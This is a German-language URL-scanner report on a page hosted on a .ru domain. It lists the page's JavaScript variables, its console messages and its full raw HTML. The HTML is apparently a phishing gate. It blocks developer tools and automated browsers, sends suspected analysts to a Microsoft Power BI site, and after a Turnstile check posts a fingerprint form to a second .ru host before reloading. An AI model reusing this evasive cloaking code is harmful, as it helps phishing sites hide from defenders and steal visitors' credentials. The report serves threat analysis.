https://xl.eptsaxwl.ru/nEBrRJV/

Eingereichte URL:
https://xl.eptsaxwl.ru/nEBrRJV/
Bericht beendet:

Die von der Seite ausgehenden identifizierten Links

JavaScript-Variablen · 10 gefunden

Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind

NameTyp
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
UQqVvNrxsRobject
$function
jQueryfunction
turnstileobject
CryptoJSobject
dXxhdehxaQfunction
PUjQjcpeoOfunction

Konsolenprotokoll-Meldungen · 5 gefunden

In der Web-Konsole protokollierte Meldungen

TypKategorieProtokoll
warningnetwork
URL
https://xl.eptsaxwl.ru/nEBrRJV/
Text
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://xl.eptsaxwl.ru/nEBrRJV/
Text
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://xl.eptsaxwl.ru/nEBrRJV/
Text
A parser-blocking, cross site (i.e. different eTLD+1) script, https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://xl.eptsaxwl.ru/nEBrRJV/
Text
A parser-blocking, cross site (i.e. different eTLD+1) script, https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
errornetwork
URL
https://xl.eptsaxwl.ru/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

Der HTML-Rohtext der Seite

<!-- The road to success and the road to failure are almost exactly the same. --><!-- Successful people do what unsuccessful people are not willing to do. Don&#039;t wish it were easier; wish you were better. --><html lang="en"><head>


    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>​</title>
    <style>
body {
  background-color: #fff;
  height: 100%;
  overflow: hidden;
}
#tpDfpECwjh h4{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;}
#tpDfpECwjh h4{font-size:calc(1.3);}
@media (min-width:1200px){
#tpDfpECwjh h4{font-size:1.5rem;}
}
#tpDfpECwjh p{margin-top:0;margin-bottom:1rem;}
#tpDfpECwjh.captcha-container{position: relative;top: 121px;/*width: 100%;*/padding-right: var(--bs-gutter-x, .75rem);padding-left: var(--bs-gutter-x, .75rem);margin-right: auto;margin-left: auto;}
#tpDfpECwjh .text-center {text-align: center!important;}
@media (min-width:992px){
#tpDfpECwjh .col-lg-4{flex:0 0 auto;width:33.33333333%;}
}
#tpDfpECwjh .display-4 {font-size: 1.25rem!important;}
#tpDfpECwjh .mt-2 {margin-top: 0.5rem!important;}
#tpDfpECwjh .h4 {font-size: calc(.900rem + .3vw);}
#tpDfpECwjh .justify-content-center{justify-content:center!important;}
#tpDfpECwjh.mt-5{margin-top:3rem!important;}
#tpDfpECwjh .mt-4 {margin-top: 1rem!important;}
#tpDfpECwjh #JxFCrsjcuO {color: #6c757d;font-size:14px;margin-top: .5rem;}
    </style>
    <script>
    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
(function IOqQloDLBe() {
    let rRVKqpXndn = false;
    const xfZJxkqogt = 100;
    setInterval(function() {
        const pxvCTEEhQf = performance.now();
        debugger;
        const eZjWWzPvus = performance.now();
        if (eZjWWzPvus - pxvCTEEhQf > xfZJxkqogt && !rRVKqpXndn) {
            rRVKqpXndn = true;
            window.location.replace('https://powerbi.microsoft.com');
        }
    }, 1000);
})();
    </script>
</head>

<body style="font-family: arial, sans-serif;background-color: #fff;color: #000;padding: 20px;font-size: 18px;overscroll-behavior: contain;">
<div id="tpDfpECwjh" class="captcha-container">
<div id="LdmqPoCrxJ" class="justify-content-center">
<div class="text-center">
<form id="iOMtiwJAaV">
<div class="cf_turnstile" id="cf"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-5280e_response"></div></div>
<input type="hidden" id="sid" name="sid" value="128BqV0mZGUw09jYhEZgxoDM0JPg9antiAKCx1o4">
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="Unknown">
<input type="hidden" id="bltdref" name="bltdref" value="">
<input type="hidden" id="bltdua" name="bltdua" value="Unknown">
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
</div>
<div class="text-center" id="JxFCrsjcuO">
Running browser checks to ensure your safety.
</div>

</div>
</div>

<script>
turnstile.render('#cf', {
    sitekey: '0x4AAAAAAA0NXIimAszHw8nU',
    'error-callback': dXxhdehxaQ,
    callback: PUjQjcpeoO,
});
function dXxhdehxaQ() {
    turnstile.reset();
}
function PUjQjcpeoO() {
    var RzMVTertDi = document.getElementById("iOMtiwJAaV");
    RzMVTertDi.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = 'C3MFRp';
    var pwdNMdKyZv = "../xuD7HxYXioCisiB7BgKbml4";
    fetch('https://oTmKgqWQrsTVSErd7gIcuXhklspaECo3sBaZBu32YWG3KqNVNToDK4DM8ZpF.bfcgpixdwnw.ru/CPBnwVGrkPZqkOinkAxSsayNTCkfZtFHTUTYLEZFGLJPEKVTDSGOAYWYGAFTLX', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(pwdNMdKyZv, {
        method: "POST",
        body: new FormData(RzMVTertDi)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        location.reload();
        }
        if(data['status'] == 'error'){
        window.location.replace('https://powerbi.microsoft.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://powerbi.microsoft.com');
    }
    })
    .catch(error => {
    window.location.replace('https://powerbi.microsoft.com');
    });
}
</script>





</body></html><!-- Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. --><!-- Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->